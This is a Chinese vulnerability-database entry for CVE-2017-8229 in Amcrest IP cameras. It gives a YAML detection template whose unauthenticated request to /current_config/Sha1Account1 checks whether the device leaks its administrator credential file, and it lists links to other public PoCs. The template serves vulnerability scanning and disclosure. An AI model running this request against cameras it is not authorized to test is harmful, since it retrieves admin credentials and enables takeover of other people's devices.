CVE-2017-8229: Amcrest IP Camera Web Sha1Account1 账号密码泄漏漏洞

漏洞描述

PoC代码[已公开]

id: CVE-2017-8229

info:
  name: Amcrest IP Camera Web Sha1Account1 账号密码泄漏漏洞
  author: zan8in
  severity: critical
  description: |
    Amcrest IP Camera Web是Amcrest公司的一款无线IP摄像头，设备允许未经身份验证的攻击者下载管理凭据
    "Amcrest"
  reference:
    - http://wiki.peiqi.tech/wiki/iot/Amcrest/Amcrest%20IP%20Camera%20Web%20Sha1Account1%20%E8%B4%A6%E5%8F%B7%E5%AF%86%E7%A0%81%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E%20CVE-2017-8229.html

rules:
  r0:
    request:
      method: GET
      path: /current_config/Sha1Account1
    expression: response.status == 200 && response.body.bcontains(b'"DevInformation" :') && response.body.bcontains(b'"SerialID" :') && response.body.bcontains(b'"AuthorityList" :')
expression: r0()

相关漏洞推荐

• CVE-2017-8229: Amcrest IP Camera Web Management - Data Exposure POC

  2025-08-01 | Amcrest IP Camera Web Management
  Amcrest IPM-721S V2.420.AC00.16.R.20160909 devices allow an unauthenticated attacker to download the...

• Amcrest IP Camera Web Sha1Account1 账号密码泄漏漏洞(CVE-2017-8229) 无POC

  2022-04-06 | Amcrest IP Camera Web
  Amcrest IP Camera Web是Amcrest公司的一款无线IP摄像头，设备允许未经身份验证的攻击者下载管理凭据。

• CVE-2017-1000028: GlassFish LFI POC

  2025-09-01 | GlassFish
  GlassFish是一款强健的商业兼容应用服务器，达到产品级质量，可免费用于开发、部署和重新分发。开发者可以免费获得源代码，还可以对代码进行更改。GlassFish漏洞成因:java语义中会把&quo...

• CVE-2017-1000486: Primetek Primefaces 5.x - Remote Code Execution POC

  2025-09-01 | Primetek Primefaces
  Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution.

• CVE-2017-10271: WebLogic XMLDecoder 反序列化漏洞 CVE-2017-10271 POC

  2025-09-01 | WebLogic XMLDecoder
  Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WL...